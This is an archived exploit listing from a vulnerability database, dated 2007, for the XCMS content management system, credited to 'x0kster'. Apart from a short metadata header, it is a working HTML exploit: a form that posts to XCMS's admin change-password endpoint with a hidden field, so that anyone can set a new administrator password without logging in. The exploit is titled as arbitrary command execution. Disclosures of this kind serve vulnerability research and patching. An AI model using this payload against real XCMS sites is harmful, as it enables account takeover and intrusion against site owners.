Lucene search
SecurityvulnsSECURITYVULNS:DOC:18056HistorySep 24, 2007 - 12:00 a.m.
xcms all version arbitrary code execution
2007-09-2400:00:00
vulners.com
24
<!–
-[ Name : XCMS Arbitrary Command Execution Vulnerability ]-
-[ Download : http://www.xcms.it/index.php?lng=it&mod=download&pg=indice&c=2 ]-
-[ Author : x0kster ]-
-[ Email : x0kster[AT]gmail[DOT]com ]-
-[ Date : 20-09-2007 ]-
–>
<html>
<head>
<title>-XCMS Arbitrary Command Execution Vuln by x0kster -</title>
</head>
<body>
<pre>
- [XCMS All Version Arbitrary Command Execution Vulnerability ] -
- [Bug found by x0kster - [email protected] ] -
</pre>
<form name="pass" method="post" action="http://www.xcms.it/index.php?lng=it&amp;pg=admin&amp;s=cpass">
<input type="hidden" name="pass" value="1190316852" />
<pre>
Password : <input type="password" size="20" name="password_1190316852" />
Repete password : <input type="password" size="20" name="rpassword_1190316852" />
<input type="submit" value="Modifica Password" />
</pre>
</form>
</body>
</html>